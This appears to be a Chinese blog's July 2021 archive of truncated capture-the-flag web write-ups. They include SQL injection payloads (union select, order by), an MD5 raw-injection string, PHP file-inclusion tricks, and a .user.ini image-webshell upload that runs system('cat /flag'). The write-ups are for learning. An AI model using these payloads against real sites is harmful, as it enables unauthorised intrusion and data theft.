07 2021 档案

摘要:admin'#登录爆出admin用户密码,MD5解密无果。 常规方法一顿撸。 admin' order by 4# 报错,字段数为3。 -1' union select 1,2,3# 报出显示位。 -1' union select 1,database(),3# 报出数据库名。 -1' union 阅读全文
posted @ 2021-07-31 11:22 C10ud 阅读(60) 评论(0) 推荐(0)
摘要:一 首先判断注入点的存在以及类型。 1 正常 1' 报错,并根据报错信息以及1'#回显正常判断出符号包裹为单引号 1' and 1=1# 返回信息 1' and 1=2#无返回信息 因此存在单引号注入点 输入1' or 1=1 #可得到这个表的所有内容 二 获取列数 1' order by 1# 1 阅读全文
posted @ 2021-07-29 19:33 C10ud 阅读(74) 评论(0) 推荐(0)
摘要:一 前置知识 .user.ini文件 参考 二 解题 上传.user.ini文件,将我们上传的图片马当做php解析执行 GIF89a auto_prepend_file=shell.jpg 上传图片马 GIF89a <script language='php'>system('cat /flag') 阅读全文
posted @ 2021-07-29 15:32 C10ud 阅读(116) 评论(0) 推荐(0)
摘要:一 前置知识点 file_get_contents函数 — 将整个文件读入一个字符串 ctf中伪协议总结 二 解题 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset( 阅读全文
posted @ 2021-07-28 16:52 C10ud 阅读(69) 评论(0) 推荐(0)
摘要:抓包查看响应包。 看来是md5注入。 看一下md5函数 对于ffifdyop这个字符串经过md5函数加密为16位原始二进制格式的字符串。 content: ffifdyop hex: 276f722736c95d99e921722cf9ed621c raw: 'or'6\xc9]\x99\xe9!r 阅读全文
posted @ 2021-07-27 13:52 C10ud 阅读(41) 评论(0) 推荐(0)
摘要:查看前段发现一段php if (isset($_POST['password'])) { $password = $_POST['password']; if (is_numeric($password)) { echo "password can't be number</br>"; }elsei 阅读全文
posted @ 2021-07-26 17:24 C10ud 阅读(137) 评论(0) 推荐(0)
摘要:根据提示,考虑为源码泄露 掏出 dirsearch扫 扫到.bak备份文件 <?php include_once "flag.php"; if(isset($_GET['key'])) { $key = $_GET['key']; if(!is_numeric($key)) { exit("Just 阅读全文
posted @ 2021-07-26 09:55 C10ud 阅读(63) 评论(0) 推荐(0)
摘要:上传php一句话木马 传不上去 经查看前段没有过滤函数 所以是服务器对文件上传做了限制 文件上传校验姿势 客户端javascript校验(一般只校验后缀名) 服务端校验 文件头content-type字段校验(image/gif) 文件内容头校验(GIF89a) 后缀名黑名单校验 后缀名白名单校验 阅读全文
posted @ 2021-07-24 14:29 C10ud 阅读(74) 评论(0) 推荐(0)